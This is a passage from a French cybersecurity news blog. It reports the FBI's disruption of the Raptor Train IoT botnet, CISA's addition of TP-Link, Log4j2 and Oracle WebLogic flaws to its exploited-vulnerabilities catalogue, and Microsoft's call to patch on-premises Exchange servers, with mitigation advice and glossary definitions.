* Créer une liste de nouvelles tactiques, techniques et procédures adverses.&#x20;
* Recommander des stratégies de cyberdéfense pertinentes.&#x20;

Avec ChatGPT, les équipes de cybersécurité pourraient éventuellement être en mesure d'obtenir une compréhension complète, précise et actualisée du paysage des menaces en un instant, afin d'ajuster leurs contrôles de sécurité en conséquence.

## Votre avis?

<figure><img src="/files/PKDVpR9UcLJS2BpjkMnA" alt=""><figcaption><p>Cette image n'est pas générée par IA mais appartient bien à NINTENDO <span data-gb-custom-inline data-tag="emoji" data-code="1f602">😂</span></p></figcaption></figure>

Votre avis m'intéresse:

* Que pensez-vous de CHATGPT ou tout autre IA?&#x20;
* Avez-vous des craintes ou au contraire êtes-vous très enthousiaste ?&#x20;
* Voyez-vous des limites, un potentiel ou juste une tendance?

[**Réagissez ou laisser moi votre question via le formulaire**](https://blog.be-hacktive.com/contact) :smile:


# Le FBI démantèle Raptor Train : Un Botnet Chinois qui a Infecté 260 000 Appareils IoT dans le monde!

<figure><img src="/files/c492HIctjOJDNfK5H2x0" alt=""><figcaption></figcaption></figure>

Le **Raptor Train** est un botnet sophistiqué et de grande envergure, actif depuis mai 2020. Il a compromis plus de **260 000 dispositifs IoT** et réseaux de petites entreprises, y compris des routeurs et des caméras IP. Ce botnet est attribué au groupe de hackers d’État chinois **Flax Typhoon**, connu pour ses campagnes de cyberespionnage visant des infrastructures critiques aux États-Unis, à Taïwan et dans d'autres pays. Ce groupe utilise une architecture de botnet complexe et multi-niveaux, ce qui en fait une menace persistante et difficile à éradiquer.

⏩ Pour ceux qui ne sont pas familiers avec les termes techniques, n'hésitez pas à consulter le [**chapitre "Définition**](#definition)[**"**](#definition) sinon continuez directement l'article avec le [**Chapitre "Fonctionnement et Infrastructure du Raptor Train".**](#fonctionnement-et-infrastructure-du-raptor-train)

## Fonctionnement et Infrastructure du Raptor Train

Le **Raptor Train** utilise un réseau à trois niveaux pour maximiser son efficacité et sa capacité de commandement et contrôle :

* **Niveau 1 (TIER 1)** : Regroupe les appareils infectés, tels que des routeurs, des caméras IP et des serveurs NAS. Les appareils infectés dans ce niveau restent généralement actifs pendant environ 17 jours avant d'être remplacés par de nouveaux dispositifs compromis.

  * *La majorité des nodes TIER 1 (Niveau 1) est géolocalisée aux  États-Unis, Taiwain, Vietnam, Brésil, Hong Kong et Turquie.*

* **Niveau 2 (TIER 2)** : Constitué de serveurs virtuels dédiés qui agissent comme serveurs C2 (Command and Control), exploitant et livrant les charges utiles aux appareils du niveau 1. Ces serveurs sont stratégiquement organisés pour rendre les opérations plus difficiles à détecter et à perturber.

  * *Les nœuds de niveau 2, quant à eux, font l'objet d'une rotation tous les 75 jours environ et sont principalement basés aux États-Unis, à Singapour, au Royaume-Uni, au Japon et en Corée du Sud. Le nombre de nœuds C2 est passé d'environ 1 à 5 entre 2020 et 2022 à pas moins de 60 entre juin 2024 et août 2024.*

* **Niveau 3 (TIER 3)** : Ce niveau est responsable de la gestion manuelle des nœuds de niveau 2 et supervise les opérations du botnet, y compris l'envoi de commandes, la collecte des données et la gestion des exploits via une interface centralisée appelée **Sparrow**. Le contrôle est exercé via des connexions **SSH** pendant les heures de travail en Chine, suggérant que les opérateurs du botnet travaillent selon des horaires réguliers.
  * *Au total, plus de 1,2 million d'enregistrements de dispositifs compromis ont été identifiés dans une base de données MySQL hébergée sur un serveur de gestion de niveau 3 utilisé pour administrer et contrôler le botnet et les serveurs C2 au moyen de l'application Sparrow. Sparrow contient également un module permettant d'exploiter les réseaux informatiques à l'aide d'un arsenal de failles connues et de type « zero-day ».*

<figure><img src="/files/8YhOvIQ2tVkkwf9OIBJa" alt=""><figcaption><p><strong>Raptor Train botnet architecture</strong><br><em>source: Black Lotus Labs</em></p></figcaption></figure>

### Campagnes d'infection du Raptor Train

Le botnet **Raptor Train** a conduit plusieurs campagnes distinctes depuis son émergence en 2020, exploitant diverses failles dans les appareils IoT et les réseaux. Ces campagnes se différencient par les domaines C2 (Command and Control) et les types d'appareils ciblés :

* **Crossbill** (de mai 2020 à avril 2022) : Utilisation du domaine C2 **k3121.com** et ses sous-domaines associés.
* **Finch** (de juillet 2022 à juin 2023) : Utilisation du domaine C2 **b2047.com** et ses sous-domaines associés.
* **Canary** (de mai 2023 à août 2023) : Utilisation du domaine C2 **b2047.com**, avec une infection en plusieurs étapes.
* **Oriole** (de juin 2023 à septembre 2024) : Utilisation du domaine C2 **w8510.com** et ses sous-domaines associés.

La **campagne Canary** s'est concentrée sur les modems **ActionTec PK5000**, les caméras IP **Hikvision**, ainsi que sur les NVRs de **Shenzhen TVT** et les routeurs **ASUS**. Cette campagne est remarquable par son utilisation d'une chaîne d'infection multi-étapes. La première étape consiste à télécharger un script bash, qui se connecte à un serveur de charge utile de niveau 2 pour récupérer un malware appelé **Nosedive**, suivi d'un script bash de deuxième étape.

Chaque nouvelle étape tente ensuite de télécharger et d'exécuter des scripts supplémentaires à intervalles réguliers, toutes les 60 minutes, pour maintenir l'infection.

<figure><img src="/files/NLaJ7aEC8EnnROScGF9h" alt=""><figcaption><p><strong>Canary Campaign July 2023</strong><br><em>source: Black Lotus Labs</em></p></figcaption></figure>

## Exploits et Vulnérabilités Utilisés

Le **Raptor Train** exploite plus de **20 types de dispositifs** différents, incluant des marques comme **TP-Link**, **ASUS**, **Hikvision**, et **Synology**. Les hackers tirent parti de failles zero-day (inconnues et non corrigées) et de vulnérabilités connues pour pénétrer ces appareils. Cela permet une propagation rapide du botnet, qui reste résistant aux solutions de défense traditionnelles grâce à l'absence de mécanismes de persistance dans ses charges utiles.

## Impact et Cibles

Le botnet vise principalement des secteurs stratégiques comme les infrastructures critiques, les télécommunications, le secteur militaire, et l'éducation supérieure, en particulier aux **États-Unis** et à **Taïwan**. En juin 2023, le **Raptor Train** contrôlait déjà **60 000 appareils actifs**, mais avec des campagnes telles que **Canary** et **Oriole**, ce nombre a grimpé à **plus de 260 000 appareils compromis**. Les États-Unis et d'autres pays ont également été touchés, avec près de **385 000 dispositifs** uniquement aux États-Unis enregistrés dans la base de données du botnet.

Dans une publication dans "[**JOINT Cybersecurity Advisory**](https://www.ic3.gov/Media/News/2024/240918.pdf)" du 18 septembre 2024, les tableaux suivants ont été publiés:

### Appareil "BOTNET" par pays

<figure><img src="/files/ACZWHjtpo6f2QXxgybME" alt=""><figcaption><p>Botnet devices per country<br>Source: FBI communication</p></figcaption></figure>

### Appareil "BOTNET" par continent

<figure><img src="/files/ZHmFkVMtOu6LnpW0fPPA" alt=""><figcaption><p>Botnet devices per continent<br>Source: FBI communication</p></figcaption></figure>

### Appareil "BOTNET" par architecture de processeur

<figure><img src="/files/RA9dRWk8VqTxVapK4IdV" alt=""><figcaption><p>Botnet devices by processor architecture<br>Source: FBI communication</p></figcaption></figure>

## Réactions et Contre-mesures

Face à la montée en puissance du Raptor Train, les autorités américaines, avec la collaboration d'organisations internationales, ont mené des opérations coordonnées pour démanteler l'infrastructure du botnet. Utilisant des **ordonnances judiciaires**, le **FBI** a pris le contrôle de certains serveurs C2 et envoyé des commandes pour supprimer les malwares des appareils compromis. Toutefois, les opérateurs du botnet ont réagi par une tentative d'attaque **DDoS** contre les infrastructures américaines, sans succès. Le **FBI** et d'autres organismes continuent de surveiller l'activité du botnet, et des efforts de mitigation sont en cours pour aider les propriétaires d'appareils à sécuriser leurs réseaux.

## Mesures de mitigation recommandées

Le **FBI** recommande aux défenseurs de réseaux d'adopter les actions suivantes pour atténuer les menaces posées par les adversaires qui utilisent des botnets à des fins de cyberactivité malveillante. Ces mesures visent à empêcher les appareils **IoT** de faire partie d'un botnet, ainsi qu'à protéger les réseaux déjà infectés par des botnets.

1. **Désactiver les services et ports inutilisés** : Cela inclut des fonctionnalités telles que la configuration automatique, l'accès à distance ou les protocoles de partage de fichiers. Les routeurs et les appareils IoT peuvent offrir des fonctionnalités telles que **Universal Plug and Play (UPnP)**, les options de gestion à distance, ou les services de partage de fichiers, qui peuvent être exploités par des attaquants pour obtenir un accès initial ou propager des malwares à d'autres dispositifs du réseau. Désactivez ces fonctionnalités si elles ne sont pas nécessaires.
2. **Mettre en œuvre la segmentation du réseau** : Assurez-vous que les dispositifs IoT sont isolés dans des segments de réseau pour réduire les risques en cas de compromission. Utilisez le principe du **moindre privilège** pour fournir aux appareils uniquement la connectivité nécessaire pour accomplir leur fonction.
3. **Surveiller les volumes de trafic réseau élevés** : Les attaques **DDoS** émanant des botnets peuvent initialement sembler être du trafic normal. Il est donc crucial de définir, surveiller et se préparer à détecter tout trafic anormal. La surveillance peut être effectuée via des pare-feux ou des systèmes de détection d'intrusion. Certaines solutions de réseau, telles que des proxys, peuvent aider à atténuer les incidents DDoS.
4. **Appliquer des correctifs et des mises à jour** : Installez régulièrement les mises à jour logicielles et les correctifs de sécurité sur les appareils IoT. Des correctifs réguliers permettent de combler les vulnérabilités connues. Si possible, utilisez les canaux de mises à jour automatiques provenant de sources fiables. Ne faites pas confiance aux e-mails qui prétendent fournir des mises à jour logicielles sous forme de pièces jointes ou de liens vers des sites non sécurisés.
5. **Remplacer les mots de passe par défaut par des mots de passe sécurisés** : De nombreux produits IoT incluent des mots de passe d'administration en plus d'autres comptes d'utilisateur. Assurez-vous que tous les mots de passe sont modifiés par rapport à leurs valeurs par défaut, et appliquez une politique de mots de passe robustes. Si possible, désactivez les indices de mot de passe.
6. **Prévoir le redémarrage des appareils** : Le redémarrage d'un appareil termine tous les processus en cours d'exécution, ce qui peut éliminer certains types de malwares, comme les malwares "sans fichier" qui s'exécutent uniquement dans la mémoire de l'hôte. Si un appareil est compromis, envisagez de redémarrer les appareils touchés à distance, voire manuellement si nécessaire.
7. **Remplacer les équipements en fin de vie** : Les dispositifs obsolètes ou en fin de vie devraient être remplacés par des appareils soutenus par des fournisseurs disposant de mises à jour régulières et de mesures de support technique adéquates.

## Conclusion

Le **Raptor Train** reste une menace active, et bien que des efforts aient été faits pour perturber ses opérations, sa structure sophistiquée et sa capacité à exploiter de nouvelles vulnérabilités en font une cible prioritaire pour les forces de sécurité informatique mondiales. La mise à jour des appareils IoT et la mise en place de défenses appropriées sont cruciales pour limiter les futures infections.

***

## Définitions des termes techniques

Pour aider à mieux comprendre les détails techniques abordés dans cet article, voici une série de définitions clés. Si vous n'êtes pas familier avec certains des concepts, cette section vous fournira des explications simples et accessibles des termes essentiels liés aux cyberattaques, aux botnets et aux vulnérabilités informatiques. Ces définitions permettront d'éclairer le fonctionnement du **Raptor Train** et des mesures prises par le **FBI** pour démanteler cette menace.

### 1. **Botnet**

{% hint style="info" %}
Un **botnet** est un réseau d'ordinateurs ou de dispositifs infectés par un logiciel malveillant, qui sont contrôlés à distance par un cybercriminel appelé "bot herder". Ces appareils infectés, souvent appelés **bots** ou **zombies**, exécutent des tâches malveillantes telles que des attaques de type **DDoS** (Distributed Denial of Service), le vol de données ou l'envoi de spams. Les utilisateurs des appareils infectés ne savent généralement pas que leurs systèmes font partie d'un botnet.
{% endhint %}

**Source** : [**Kaspersky**](https://www.kaspersky.com/resource-center/threats/botnet-attacks)

### 2. **DDoS (Distributed Denial of Service)**

{% hint style="info" %}
Une attaque par déni de service distribué (DDoS) est une tentative de rendre un service en ligne ou un réseau indisponible en le submergeant avec un flux de trafic provenant de plusieurs sources. Dans une attaque DDoS, des milliers d'ordinateurs compromis (souvent appartenant à un botnet) sont utilisés pour inonder une cible avec un volume de demandes très élevé, surchargent les ressources et rendant le service inaccessible.
{% endhint %}

**Source** : [**Cloudflare**](https://www.cloudflare.com/fr-fr/learning/ddos/what-is-a-ddos-attack/)

### 3. **IoT (Internet of Things)**

{% hint style="info" %}
L'**Internet des objets** (IoT) désigne l'interconnexion de dispositifs physiques (tels que des caméras, des routeurs, des appareils électroménagers) via Internet, qui peuvent collecter et échanger des données. Ces dispositifs sont souvent des cibles privilégiées pour les cyberattaques en raison de leur sécurité souvent moins robuste.
{% endhint %}

**Source** : [**IBM**](https://www.ibm.com/topics/internet-of-things)

### 4. **Zero-Day Vulnerability**

{% hint style="info" %}
Une **faille zero-day** est une vulnérabilité dans un logiciel qui est exploitée par des cybercriminels avant que le développeur du logiciel ou le fournisseur de sécurité n'ait connaissance de son existence et ait eu le temps de la corriger. Une attaque zero-day est particulièrement dangereuse car il n'existe pas encore de correctif ou de mise à jour pour protéger les utilisateurs.
{% endhint %}

**Source** : [**Trend Micro**](https://www.trendmicro.com/vinfo/us/security/definition/zero-day-vulnerability#:~:text=A%20zero%2Dday%20vulnerability%20is,called%20a%20zero%2Dday%20exploit.)

### 5. **C2 (Command and Control)**

{% hint style="info" %}
Dans le contexte des cyberattaques, un **serveur C2 (Command and Control)** est utilisé par les cybercriminels pour communiquer avec des dispositifs compromis dans un botnet. Ces serveurs envoient des instructions aux appareils infectés et reçoivent des données volées, tout en permettant aux attaquants de contrôler le réseau de bots.
{% endhint %}

**Source** : [**Fortinet**](https://www.fortinet.com/lat/resources/cyberglossary/command-and-control-attacks)

### **Sources**&#x20;

* [The Hacker News](https://thehackernews.com/2024/09/new-raptor-train-iot-botnet-compromises.html)
* [Bleeping Computer](https://www.bleepingcomputer.com/news/security/flax-typhoon-hackers-infect-260-000-routers-ip-cameras-with-botnet-malware/)
* [Gov Info Security](https://www.govinfosecurity.com/raptor-train-botnet-infects-260000-devices-globally-a-26327)


# Exploitation active des vulnérabilités de TP-Link, d'Apache et d'Oracle détectées

Date: 02-05-2023

<figure><img src="/files/pjXgIP577C2FJUrU4MTG" alt=""><figcaption></figcaption></figure>

\
L'Agence américaine de cybersécurité et de sécurité des infrastructures (CISA) a mis à jour le [**catalogue des vulnérabilités exploitées connues (KEV)**](https://www.cisa.gov/known-exploited-vulnerabilities-catalog) en y ajoutant trois nouvelles failles, en raison de preuves d'exploitation en cours.

Les vulnérabilités de sécurité identifiées comprennent :

* [**CVE-2023-1389**](https://nvd.nist.gov/vuln/detail/CVE-2023-1389) (score CVSS : 8,8) - TP-Link Archer AX-21 Command Injection Vulnerability
* [**CVE-2021-45046**](https://nvd.nist.gov/vuln/detail/CVE-2021-45046) (score CVSS : 9,0) - Apache Log4j2 Deserialization of Untrusted Data Vulnerability
* [**CVE-2023-21839**](https://nvd.nist.gov/vuln/detail/CVE-2023-21839) (score CVSS : 7,5) - Oracle WebLogic Server Unspecified Vulnerability

{% hint style="info" %}
CVE:\
\
L'acronyme CVE, pour Common Vulnerabilities and Exposures en anglais, désigne une liste publique de failles de sécurité informatique. Lorsque l'on parle d'une CVE, on fait généralement référence à une faille de sécurité à laquelle un identifiant CVE a été attribué.

Les avis de sécurité publiés par les fournisseurs et chercheurs mentionnent presque toujours au moins un identifiant CVE. Les CVE aident les professionnels à coordonner leurs efforts visant à hiérarchiser et résoudre les vulnérabilités, et ainsi renforcer la sécurité des systèmes informatiques.

\
SOURCE: [**REDHAT**](https://www.redhat.com/fr/topics/security/what-is-cve)
{% endhint %}

La [**CVE-2023-1389**](https://nvd.nist.gov/vuln/detail/CVE-2023-1389) concerne une vulnérabilité d'injection de commandes affectant les routeurs TP-Link Archer AX-21, qui pourrait être exploitée pour permettre l'exécution de code à distance. L'Initiative [**Zero Day de Trend Micro**](https://www.zerodayinitiative.com/blog/2023/4/21/tp-link-wan-side-vulnerability-cve-2023-1389-added-to-the-mirai-botnet-arsenal) a signalé que depuis le 11 avril 2023, des acteurs malveillants associés au botnet Mirai exploitent activement cette faille.

La seconde vulnérabilité ajoutée au catalogue KEV est la [**CVE-2021-45046**](https://nvd.nist.gov/vuln/detail/CVE-2021-45046), qui concerne l'exécution de code à distance dans la bibliothèque de journalisation Apache Log4j2, découverte en décembre 2021.

{% hint style="success" %}
Un article est disponible chez Be-Hacktive:\
\=> [**LOG4J: La librairie vulnérable qui secoue la planète**](/french/articles/log4j-la-librairie-vulnerable-qui-secoue-la-planete)
{% endhint %}

La manière exacte dont cette vulnérabilité spécifique est exploitée n'est pas encore claire. Cependant, [**GreyNoise a recueilli des données**](https://viz.greynoise.io/tag/apache-log4j-rce-attempt?days=30) indiquant des tentatives d'exploitation provenant de pas moins de 74 adresses IP uniques au cours des 30 derniers jours. Cela inclut également la CVE-2021-44228 (également connue sous le nom de **Log4Shell**).

{% hint style="success" %}
Un article est disponible chez Be-Hacktive:

\=> [**LOG4SHELL: VENI,VIDI,VICI**](/french/articles/log4shell-veni-vidi-vici)
{% endhint %}

Le dernier ajout à la liste est un bug de haute gravité trouvé dans les versions **12.2.1.3.0**, **12.2.1.4.0** et **14.1.1.0.0** du serveur **Oracle WebLogic**, qui pourrait potentiellement permettre un <mark style="color:red;">**accès non autorisé à des informations sensibles**</mark>. **Oracle a publié des correctifs pour ce problème en janvier 2023.**

> *"Le serveur Oracle WebLogic contient une vulnérabilité non spécifiée qui permet à un attaquant non authentifié ayant un accès réseau via T3, IIOP, de compromettre le serveur Oracle WebLogic", a déclaré la CISA.*

Bien que des preuves de concept (PoC) d'exploits pour la faille existent, il ne semble pas y avoir de rapports publics d'exploitation malveillante.

<figure><img src="/files/Wdbeeh8VUsycShhEQTBX" alt=""><figcaption><p>Aucune IP observée avec une tentative d'exploitation de la CVE-2023-21839</p></figcaption></figure>

Les agences de la Branche exécutive civile fédérale (FCEB - Federal Civilian Executive Branch) sont tenues de mettre en œuvre les correctifs fournis par les fournisseurs avant le 22 mai 2023, afin de protéger leurs réseaux contre ces menaces actives.

Cette recommandation intervient un peu plus d'un mois après que [**VulnCheck a révélé que près de quatre douzaines de failles de sécurité**](https://vulncheck.com/blog/2022-missing-kev-report), probablement utilisées comme armes dans la nature en 2022, sont absentes du catalogue KEV.

Parmi les 42 vulnérabilités, une écrasante majorité est liée à l'exploitation par des botnets similaires à Mirai (27), suivie par les gangs de ransomware (6) et d'autres acteurs menaçants (9).

<figure><img src="/files/Anv62HbQJUwsdjLuLIvR" alt=""><figcaption><p>Résultat du rapport: <a href="https://vulncheck.com/blog/2022-missing-kev-report"><strong>The VulnCheck 2022 Exploited Vulnerability Report - Missing CISA KEV Catalog Entries</strong></a></p></figcaption></figure>


# Microsoft insiste sur l'urgence de patcher les serveurs Exchange en local

Date: 27-01-2023

## Patching et Monitoring

<figure><img src="/files/hjJgKLsYty40GFGRm2ll" alt=""><figcaption></figcaption></figure>

Microsoft a insisté aujourd'hui auprès de ses clients pour qu'ils maintiennent leurs "serveurs Exchange sur site" **patchés** en appliquant la dernière [**mise à jour cumulative (CU)**](https://learn.microsoft.com/fr-fr/troubleshoot/windows-client/deployment/standard-terminology-software-updates) prise en charge afin qu'ils soient toujours prêts à déployer une mise à jour de sécurité d'urgence.

{% hint style="info" %}
Gestion des correctifs:\
La **gestion des correctifs consiste** à identifier et à déployer des mises à jour logicielles, également appelées « correctifs » ou « **patchs** », sur différents endpoints, notamment des ordinateurs, des terminaux mobiles et des serveurs.

Les correctifs sont généralement distribués par les développeurs de logiciels pour corriger des vulnérabilités de sécurité ou des problèmes techniques connus. Ils permettent également d’ajouter de nouvelles fonctionnalités et fonctions à l’application. Ces solutions à court terme sont destinées à être utilisées jusqu’à la publication de la version suivante du logiciel.

Définition: [**Crowdstrike**](https://www.crowdstrike.fr/cybersecurity-101/patch-management/)
{% endhint %}

[Tony Redmond, le MVP de Microsoft](https://mvp.microsoft.com/en-us/PublicProfile/9501) (Most Valuable Professional), affirme que le processus de mise à jour du serveur Exchange est "simple" et recommande de toujours exécuter le script [**Exchange Server Health Checker** ](https://microsoft.github.io/CSS-Exchange/Diagnostics/HealthChecker/)après l'installation des mises à jour.&#x20;

{% hint style="warning" %}
*N.D.L.R: Pour la simplicité des processus de mise à jour Windows, tout est relatif car beaucoup d'administrateurs systèmes pourraient la contester avec de (très) bons arguments.*
{% endhint %}

Le script Exchange Server Health Checker aide à détecter les problèmes de configuration courants qui sont connus pour causer des problèmes de performance et d'autres problèmes de longue durée qui sont causés par un simple changement de configuration dans un environnement Exchange. Il permet également de collecter des informations utiles sur votre serveur afin d'accélérer le processus de collecte des informations courantes sur votre serveur.

## Les vulnérabilités Exchange toujours d'actualité

<figure><img src="/files/zRjLBz0I5o3dZHS4XOSD" alt=""><figcaption></figcaption></figure>

L'avertissement d'aujourd'hui survient après que Microsoft a également demandé aux administrateurs de patcher continuellement les serveurs Exchange sur site après avoir publié des mises à jour de sécurité hors bande d'urgence pour corriger les vulnérabilités ProxyLogon qui ont été exploitées dans des attaques deux mois avant la publication des correctifs officiels.

En mars 2021, au moins dix groupes de pirates utilisaient les exploits ProxyLogon à des fins diverses, l'un d'entre eux étant un groupe de menaces sponsorisé par la Chine et suivi par Microsoft sous le nom de Hafnium.

Pour montrer le nombre considérable d'organisations exposées à de telles attaques, l'Institut néerlandais pour la divulgation des vulnérabilités (DIVD) a trouvé 46 000 serveurs non protégés contre les vulnérabilités ProxyLogon une semaine après la publication des mises à jour de sécurité de Microsoft.

Plus récemment, en novembre 2022, Microsoft a corrigé une autre série de bugs Exchange connus sous le nom de ProxyNotShell, qui permettent l'escalade des privilèges et l'exécution de code à distance sur des serveurs compromis, deux mois après la première détection d'une exploitation sauvage.

<figure><img src="/files/5ATUYHR7FDLHZ6SC1rNW" alt="Les serveurs Exchange non protégés contre ProxyNotShell - Source: ShadowServer"><figcaption><p>Les serveurs Exchange non protégés contre ProxyNotShell - Source: <a href="https://twitter.com/Shadowserver/status/1607439237615419400?s=20&#x26;t=vwmgpsCoLhLlsjEHJxZcwwShadow">ShadowServer</a></p></figcaption></figure>

Pour mettre les choses en perspective, au début du mois, les chercheurs en sécurité de la [**Shadowserver Foundation**](https://www.shadowserver.org/) ont découvert que plus de 60 000 serveurs Microsoft Exchange exposés en ligne sont toujours vulnérables aux attaques exploitant les exploits ProxyNotShell ciblant la vulnérabilité [CVE-2022-41082](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41082) d'exécution de code à distance (RCE).

{% hint style="info" %}
CVE:

L'acronyme CVE, pour Common Vulnerabilities and Exposures en anglais, désigne une liste publique de failles de sécurité informatique. Lorsque l'on parle d'une CVE, on fait généralement référence à une faille de sécurité à laquelle un identifiant CVE a été attribué.

Les avis de sécurité publiés par les fournisseurs et chercheurs mentionnent presque toujours au moins un identifiant CVE. Les CVE aident les professionnels à coordonner leurs efforts visant à hiérarchiser et résoudre les vulnérabilités, et ainsi renforcer la sécurité des systèmes informatiques.

\
SOURCE: [**REDHAT**](https://www.redhat.com/fr/topics/security/what-is-cve)
{% endhint %}

Pour aggraver les choses, une recherche sur **Shodan** montre un nombre considérable de serveurs Exchange exposés en ligne, dont des milliers attendent encore d'être sécurisés contre les attaques ciblant les failles ProxyShell et ProxyLogon, parmi les vulnérabilités les plus exploitées en 2021/2022.

{% hint style="info" %}
Shodan:

Shodan est un site web spécialisé dans la recherche d'objets connectés à Internet, et ayant donc une [adresse IP](https://fr.wikipedia.org/wiki/Adresse_IP) visible sur le réseau. Il permet ainsi de trouver une variété de [serveurs web](https://fr.wikipedia.org/wiki/Serveur_web), de [routeurs](https://fr.wikipedia.org/wiki/Routeur) ainsi que de nombreux périphériques tels que des imprimantes ou des caméras. Une telle requête est traitée avec une simple analyse de l’entête [HTTP](https://fr.wikipedia.org/wiki/Hypertext_Transfer_Protocol) renvoyée par l’appareil ou le serveur. Il est alors possible de récupérer des listes d'éléments spécifiques. Pour chaque résultat, on trouve l'adresse IP du serveur ainsi que d'autres types d'informations sensibles mais accessibles.\
\
SOURCE: [**WIKIPEDIA**](https://fr.wikipedia.org/wiki/Shodan_\(site_web\))
{% endhint %}


